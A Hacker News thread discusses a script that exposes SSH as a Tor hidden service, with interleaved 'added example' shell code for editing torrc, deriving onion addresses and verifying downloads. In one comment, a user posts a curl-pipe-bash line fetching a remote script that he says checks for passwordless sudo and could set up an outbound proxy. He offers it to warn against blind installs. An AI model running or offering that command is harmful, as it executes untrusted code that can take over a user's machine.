
Show HN: tor_ssh.sh – One command to enable SSH access via Tor - NickBusey
https://gitlab.com/grownetics/devops/blob/master/tor_ssh.sh
======
miduil
Shameless plug: This script I wrote a while ago "automates" setting up a
hidden tor ssh service that isn't faulty for ssh-host key enumeration. I'd
like to improve it, but I'm not sure which audience I should target. If you
could review/try it out and you have any feedback, a GitHub issue or comment
here would be very appreciated.

[https://github.com/norpol/opensshd-tor-easy-setup](https://github.com/norpol/opensshd-tor-easy-setup)

------
pwnna
This works pretty well, especially if you have personal computers behind
different NATs. One of the issues is still that you have to distribute the Tor
domain name out all over the place. You also need to keep the keys safe if you
want to keep that domain name.

These two parts I found to be more annoying to deal with, although this is true
for most VPN solutions (thinking about tinc, wireguard).

~~~
jancsika
> One of the issue is still that you have to distribute the tor domain name
> out all over the place.

I don't understand why you couldn't have a small utility to take a human
memorable password that maps to a weak-ass private key, then ratchet up to a
secure keypair on the server once the initial connection is made:

1. Run utility in "server" mode.

2. Enter password "I am not the target of a state level actor atm" into
utility

3. Utility maps your weak-ass password to a weak-ass private key, generates
the pubkey from that, and consequently creates the Tor hidden service behind
which your openssh server can now be accessed.

4. On the client, run the utility in "client" mode and type in your weak-ass
password

5. Utility maps the password to the server's weak-ass keypair and generates the
corresponding onion address from it.

6. Utility creates a tunnel over Tor to connect to that onion address.

7. Server and client are now connected, with no memorization of human
unreadable strings. Hurray!

8. Once connected, the server generates a _secure_ keypair and sends the
corresponding _new_ onion addy to the client over the current connection.

9. Client receives the new onion addy, disconnects, then connects to the new
addy.

10. Repeat for each client. Once all clients are connected, server destroys
the original hidden service.

------
buildbuildbuild
NAT traversal is a useful and underrated Tor hidden service use case.

Careful though: installing the version of Tor which is included in Ubuntu’s
distribution is not recommended, as it is often very out of date.

Use the Tor project’s PPA instead.

~~~
jamieweb
Exactly this.

Many times people have assumed that Tor is only for 'dark web' and other
things that there is no legitimate business using.

But as you say, escaping NAT is a perfect use-case. It's particularly good for
escaping CGNAT, as to be honest there aren't many other ways to escape CGNAT
and still have a 'listening' server, rather than just an always-open tunnel.

Edit: The Tor Project website has a useful section on how IT professionals use
Tor, which covers some more interesting ones:
[https://www.torproject.org/about/torusers.html.en#itprofessionals](https://www.torproject.org/about/torusers.html.en#itprofessionals)

------
dessant
This is also valuable for debugging CI builds, and it can be more secure than
the debugging mode CI services provide when coupled with an ssh key. For
example on Travis CI a host is displayed in the logs that anyone can access
through ssh.

[https://docs.travis-ci.com/user/running-build-in-debug-mode/](https://docs.travis-ci.com/user/running-build-in-debug-mode/)

------
acdha
This line was puzzling:

    # Remove the bogus tor service Ubuntu installs by default

Is there a bug in the upstream package or something? Otherwise this just looks
like a big step back from systemd to SysV — without automatic restarts the
first time the daemon exits, you're locked out of the server.

~~~
NickBusey
[https://askubuntu.com/a/903341](https://askubuntu.com/a/903341)

~~~
acdha
Typically I'd put that into a comment right above that line. I'd also really
be inclined to install a replacement service instead so you'd get automatic
restarts if you aren't very confident that you have another way into the box.

~~~
NickBusey
Yea, I agree. I actually was thinking before I posted this "Someone will ask
about that line, I should just add the link to the comments" haha. (Just added
it.)

If you read the discussion in the link, this actually does do that. It just
replaces the 'empty' service with the actual tor service. So you do get
automatic restarts.

------
berbec

    # Append the hidden service configuration to the Torrc file
    echo -e "HiddenServiceDir /var/lib/tor/onion-ssh/\nHiddenServicePort 22 127.0.0.1:22" > /etc/tor/torrc

Unless the '>' is changed to ">>", this will overwrite the torrc file.

~~~
jstanley
The default ubuntu torrc has everything commented out so is effectively blank
anyway.

Using ">" instead of ">>" means you don't end up with multiple copies of the
same hidden service.

That said, I agree: it should append, but it should first check whether it has
already added a hidden service to the file.

~~~
NickBusey
Exactly, for simplicity since nothing is in there by default, it gets
overwritten. To keep the script nice and short I decided not to add that
detection. I would happily merge the change if someone decides they care
enough to add it.

~~~
berbec
Maybe something like

    if [ $(grep "HiddenServicePort 22" /etc/tor/torrc | wc -l) -eq 0 ]; then

~~~
jstanley
Or the more idiomatic:

    if grep -q "HiddenServiceDir /var/lib/tor/onion-ssh/" /etc/tor/torrc; then

~~~
berbec
I wish bash had a ternary operator for extra IOCCC-compliance.
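
The idempotent version of that torrc edit, as an added example rather than code from tor_ssh.sh or from the comments above: the stanza is appended (never written with `>`), and only when that `HiddenServiceDir` is not already configured, so the script can be re-run without producing duplicate hidden services or clobbering whatever else is in the file. It assumes the script's own defaults (`/var/lib/tor/onion-ssh/`, port 22) and adds `HiddenServiceVersion 3`, which is recommended further down the thread.

```shell
#!/bin/sh
# Added example, not part of tor_ssh.sh: append the SSH hidden-service
# stanza to a torrc exactly once, keeping the existing file contents.

# ensure_onion_ssh TORRC [HS_DIR] [PORT]
# Returns 0 whether the stanza was added now or was already there.
ensure_onion_ssh() {
    torrc=$1
    hs_dir=${2:-/var/lib/tor/onion-ssh/}
    port=${3:-22}
    # -x: match the whole line, -F: treat the path as a literal string, so a
    # path containing regex metacharacters cannot produce a false match.
    if grep -qxF "HiddenServiceDir $hs_dir" "$torrc" 2>/dev/null; then
        return 0    # already configured: nothing to do
    fi
    printf 'HiddenServiceDir %s\nHiddenServiceVersion 3\nHiddenServicePort %s 127.0.0.1:%s\n' \
        "$hs_dir" "$port" "$port" >> "$torrc"
}

# count_onion_ssh TORRC [HS_DIR] -> how many times that HiddenServiceDir
# line appears (grep -c exits 1 on zero matches, hence the "|| true").
count_onion_ssh() {
    grep -cxF "HiddenServiceDir ${2:-/var/lib/tor/onion-ssh/}" "$1" 2>/dev/null || true
}

# Usage on a real host (as root), then restart tor so it reads the new stanza:
#   ensure_onion_ssh /etc/tor/torrc
```

Running the function twice, or with the same arguments spelled out explicitly, leaves a single stanza; a second hidden service with a different directory gets its own stanza without touching the first.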

------
adenner
I actually presented on something close to this a couple of months ago to the
local LUG. I made a raspberry pi tor jump server that would allow you to ssh
over tor into your home network to bust through the NAT. My slide deck is
[https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a-9d9a-7549f1dbee92/632892f26d65098d/res/e97c138c-512c-4961-853b-8a5ca8ec1c4e/PiJump.pdf](https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a-9d9a-7549f1dbee92/632892f26d65098d/res/e97c138c-512c-4961-853b-8a5ca8ec1c4e/PiJump.pdf)

------
bromonkey
tor_ssh.sh – One command to enable SSH access via Tor to _some_ servers:
Debian is not the entirety of Linux

------
jamieweb
How come you aren't using `HiddenServiceVersion 3`?

Onion v2 (16 char addresses) uses old crypto (SHA1/DH/RSA1024) and has now
been superseded by Onion v3 (56 char addresses, SHA3/ed25519/curve25519 and
many other improvements).

[https://trac.torproject.org/projects/tor/wiki/doc/NextGenOnions](https://trac.torproject.org/projects/tor/wiki/doc/NextGenOnions)
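
The v3 address format described here, and jancsika's password-to-onion bootstrap scheme earlier in the thread, share one computation: ed25519 key to onion address. The following is an added example, not code from tor_ssh.sh, opensshd-tor-easy-setup or Tor itself. It derives a seed from a password (cheaply, on purpose, matching the "weak-ass key" in that scheme), turns it into an Ed25519 public key, and produces the 56-character v3 address; server and client running `onion_from_password` with the same password land on the same address. It assumes openssl 1.1.1 or newer (Ed25519 and SHA3-256) and GNU coreutils `base32`; the salt string is a hypothetical constant both sides must agree on. Writing the key into `HiddenServiceDir` (Tor's `hs_ed25519_secret_key` holds the SHA-512-expanded form of the seed, not the seed itself) is not shown.

```shell
#!/bin/sh
# Added example: password -> ed25519 seed -> public key -> v3 onion address,
# plus the checksum verification a client should run on any address it
# receives over the bootstrap connection. Key bytes live in temp files only.

# Hypothetical salt; both sides must agree on it. It is not a secret.
SALT="tor-ssh-password-onion-v1"

# seed_from_password PASSWORD -> 32 raw bytes on stdout.
# Deliberately cheap: whoever guesses the password owns the private key,
# not merely the address, which is why the bootstrap onion must be retired.
seed_from_password() {
    printf '%s:%s' "$SALT" "$1" | openssl dgst -sha256 -binary
}

# seed_to_pubkey SEED_FILE -> 32 raw Ed25519 public-key bytes on stdout.
# The 16-byte prefix is the fixed PKCS#8 header of an Ed25519 private key
# (RFC 8410, OID 1.3.101.112); the raw public key is the last 32 bytes of
# the SubjectPublicKeyInfo that openssl emits.
seed_to_pubkey() {
    {
        printf '\060\056\002\001\000\060\005\006\003\053\145\160\004\042\004\040'
        cat "$1"
    } | openssl pkey -inform DER -pubout -outform DER | tail -c 32
}

# pubkey_to_onion PUBKEY_FILE -> the 56-character address without ".onion".
# rend-spec-v3: base32(PUBKEY || CHECKSUM[0:2] || 0x03) where
# CHECKSUM = SHA3-256(".onion checksum" || PUBKEY || 0x03).
pubkey_to_onion() {
    ck=$(mktemp)
    { printf '.onion checksum'; cat "$1"; printf '\003'; } \
        | openssl dgst -sha3-256 -binary | head -c 2 > "$ck"
    { cat "$1"; cat "$ck"; printf '\003'; } | base32 | tr 'A-Z' 'a-z'
    rm -f "$ck"
}

# onion_from_password PASSWORD -> "<56 chars>.onion"
onion_from_password() {
    d=$(mktemp -d)
    seed_from_password "$1" > "$d/seed"
    seed_to_pubkey "$d/seed" > "$d/pub"
    addr=$(pubkey_to_onion "$d/pub")
    rm -rf "$d"
    printf '%s.onion\n' "$addr"
}

# onion_is_valid ADDRESS -> 0 if the embedded checksum and version byte
# agree with the embedded public key, 1 otherwise.
onion_is_valid() {
    d=$(mktemp -d); rc=1
    if printf '%s' "${1%.onion}" | tr 'a-z' 'A-Z' | base32 -d > "$d/raw" 2>/dev/null \
       && [ "$(wc -c < "$d/raw" | tr -d ' ')" -eq 35 ]; then
        head -c 32 "$d/raw" > "$d/pub"
        [ "$(pubkey_to_onion "$d/pub")" = "${1%.onion}" ] && rc=0
    fi
    rm -rf "$d"
    return $rc
}

# Stand-alone demo: both sides print the same address for the same password.
if [ "${1:-}" = demo ]; then
    onion_from_password "I am not the target of a state level actor atm"
fi
```

`seed_to_pubkey` is checked against RFC 8032's first Ed25519 test vector, so a wrong PKCS#8 prefix or a broken openssl shows up immediately; `onion_is_valid` rejects an address whose checksum or version byte does not match, which is the cheapest thing a client can do before connecting to an address someone sent it.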

------
0xdeadbeefbabe
Will ssh experience timeouts and connection aborts detailed here
[http://sites.inka.de/bigred/devel/tcp-tcp.html](http://sites.inka.de/bigred/devel/tcp-tcp.html) or is that not
applicable?

Nice script BTW.

------
ressetera
There's also torsocks or even tsocks if you need something more battle tested.

EDIT: I stand corrected, see @buildbuildbuild reply.

~~~
buildbuildbuild
That does the reverse: allows you to connect to public IP addresses through
Tor. This solution exposes your local SSH server as a static hidden service
without needing to forward ports in a NATed environment.

------
thomasdd
Posted on HN 6 days ago, by same user: (zero comments received).

[https://news.ycombinator.com/item?id=19265301](https://news.ycombinator.com/item?id=19265301)

------
throwaway2048
"any server" running ubuntu...

------
UI_at_80x24
I like the theory behind this and the motivation. But this has to stop:

> # Usage (as root): $ bash <(curl -s [https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh](https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh))

Spoon feeding like this is why Windows has such a disgusting history of
malware, and only encourages people to not think about what they are doing.

~~~
acdha
What specific threat do you believe your advice is protecting people against?

~~~
LinuxBender
sudo -n is a start.

Here is one I wrote that shows your internet speed, but will also check to see
if you have passwordless sudo. Even without sudo, I could spawn and persist a
gateway port ssh proxy outbound to a VPS node, but with sudo, I could do much
more.

    curl -A Mozilla -s https://tinyvpn.org/misc/url_test.txt | bash

~~~
acdha
… and you've installed this on Gitlab's servers? If not, the knowledge that
people write malicious code is not new but the problem isn't running it using
curl but not vetting the source and code before you run it. Focusing on the
use of curl distracts attention from the part which matters.

~~~
LinuxBender
I understand what you are saying, but respectfully disagree.

Conditioning people to use `curl | bash` trains them to not review anything
and blindly run untrusted code. I have proven this across a very large group
of people, including many that are supposed to be security minded. This
technique works on nearly all organizations, as most companies and government
agencies do not force outbound traffic through a mitm proxy. I have mixed
feelings about those devices.

For what it's worth, where the code is running from doesn't really matter. The
only advantage to pulling something from gitlab or github, is that I have to
commit changes that anyone could see assuming I dont recreate the repo, which
I can automate in their API. From any of my own VM's or servers, I can
certainly make something look like a .txt that isn't and dynamically changes
based on user-agent, remote addr, latency, ttl, etc.. I could even change the
response if someone used curl with a fake user-agent, based on timing, but
that is another blog post for another day.

~~~
acdha
Fair enough but I would ask whether this is really that much worse than, say,
running "npm install" or "pip install" for a package whose author you don't
implicitly trust. From my perspective, that time would be better spent
educating developers and working to make their tools safer to use — for
example, using aws-vault on a Mac means that a drive-by script cannot
harvest your AWS credentials (the key chain requires prompting per-binary and
the user cannot bypass it).

~~~
LinuxBender
Tools like pip, pear, gem, etc... are quite bad as well. Unless they are
validating gpg checks of files or packages against a trusted source, then you
could easily be installing a package from a mirror that has been compromised.
In fact, this has happened to python repositories several times.

Even gpg checks, when done the way Ubuntu and Redhat do it, are also bad. I see
people install the gpg keys from the mirror all the time. If I pop the mirror,
I can simply put my own gpg keys in the mirror and a percentage of people will
happily install it.

~~~
acdha
GPG adds usability problems and doesn’t much help in the case where people
have no idea whether the remote author they’ve never met is trustworthy. In
most cases something like a Linux distribution is what you want where things
are at least highly visible and a trusted third-party is looking at the update
history.

Modern package managers do at least store hashes so your NPM, Python, Rust,
etc. packages can depend on other packages with hashes in addition to just a
version, which at least forces them to attempt to make the exploit covert
enough that it can be deployed to everyone but there are many ways to make
something subtly vulnerable. Ultimately, I really think this is coming back to
securing the environment so a successful attack gets less. Apple has led the
way on protecting things like passwords and mail from other processes running
as the same user but it’d be really interesting to see how far you could get
running your entire toolchain using the OS’ sandboxing.
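
The practical middle ground in this sub-thread (acdha: vet the code, not the transport; LinuxBender: a server can serve different bytes by User-Agent, address or timing) is to download to disk, compare against a hash you recorded when you reviewed the script, and only then run it. The following is an added example and not part of tor_ssh.sh; the hash you pin is an assumption you supply yourself, ideally for a fixed revision rather than whatever `master` currently points at.

```shell
#!/bin/sh
# Added example: "download, check, then run" instead of `bash <(curl ...)`.
# A server that tailors its response to the requester cannot pass the hash
# check without also changing the hash you hold.

# sha256_of FILE -> lowercase hex digest (coreutils sha256sum, else shasum)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX -> 0 if the digest matches (case-insensitive)
verify_sha256() {
    [ "$(sha256_of "$1")" = "$(printf '%s' "$2" | tr 'A-F' 'a-f')" ]
}

# run_if_verified FILE EXPECTED_HEX [INTERPRETER]
# Runs the file with the interpreter (default sh) only on a hash match and
# returns the script's own exit status; on mismatch prints a message and
# returns 1 without running anything.
run_if_verified() {
    if verify_sha256 "$1" "$2"; then
        "${3:-sh}" "$1"
    else
        printf 'hash mismatch: %s is not the script you reviewed; not running it\n' "$1" >&2
        return 1
    fi
}

# fetch_verify_run URL EXPECTED_HEX [INTERPRETER]
# Downloads to a temp file, then defers to run_if_verified. The file is kept
# on mismatch or failure so you can inspect what the server actually sent.
fetch_verify_run() {
    file=$(mktemp) || return 1
    if ! curl -fsSL -o "$file" "$1"; then rm -f "$file"; return 1; fi
    run_if_verified "$file" "$2" "${3:-sh}"; rc=$?
    if [ "$rc" -eq 0 ]; then rm -f "$file"; else printf 'kept %s for inspection\n' "$file" >&2; fi
    return $rc
}

# Usage (as root, after reading that revision of the script):
#   fetch_verify_run https://gitlab.com/grownetics/devops/raw/<commit-sha>/tor_ssh.sh <sha256-you-recorded> bash
```

Pinning to a commit URL plus its hash closes both gaps raised above: the repository history cannot be rewritten under you without the hash changing, and a content-switching server gets caught at the comparison rather than at the shell prompt.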

------
xiii1408
Using SSH over Tor is a supremely dumb idea unless you _really_ need to hide
your SSH sessions and you're already using other methods (pre-shared host
fingerprint, single-use SSH key) to secure your session.

1) Tor exit node operators will do all kinds of nasty things: e.g. MITM-ing
your sessions, refusing to handle certain kinds of traffic, and recording
everything.

2) If you use your regular SSH key (which you will, because you needed to use
this script to do this), your SSH key fingerprint and thus your identity is
still recorded by the remote host. Doh!

3) Everyone at the remote host will think you got haxed. Because you're
logging in through Tor. Or else they'll think you're super shady.

That said, Tor is super fun to play around with. Just don't assume anything
gives you real protection unless you're careful and really know the ins and
outs.

~~~
jstanley
1.) This doesn't go via an exit node, so this point is invalid.

2.) Why is this a problem? You already own the remote host, so you already
know your identity.

3.) It will appear to the remote host as a login from the loopback device. And
if you set this up you presumably own the remote host anyway so you don't care
what its owner thinks.

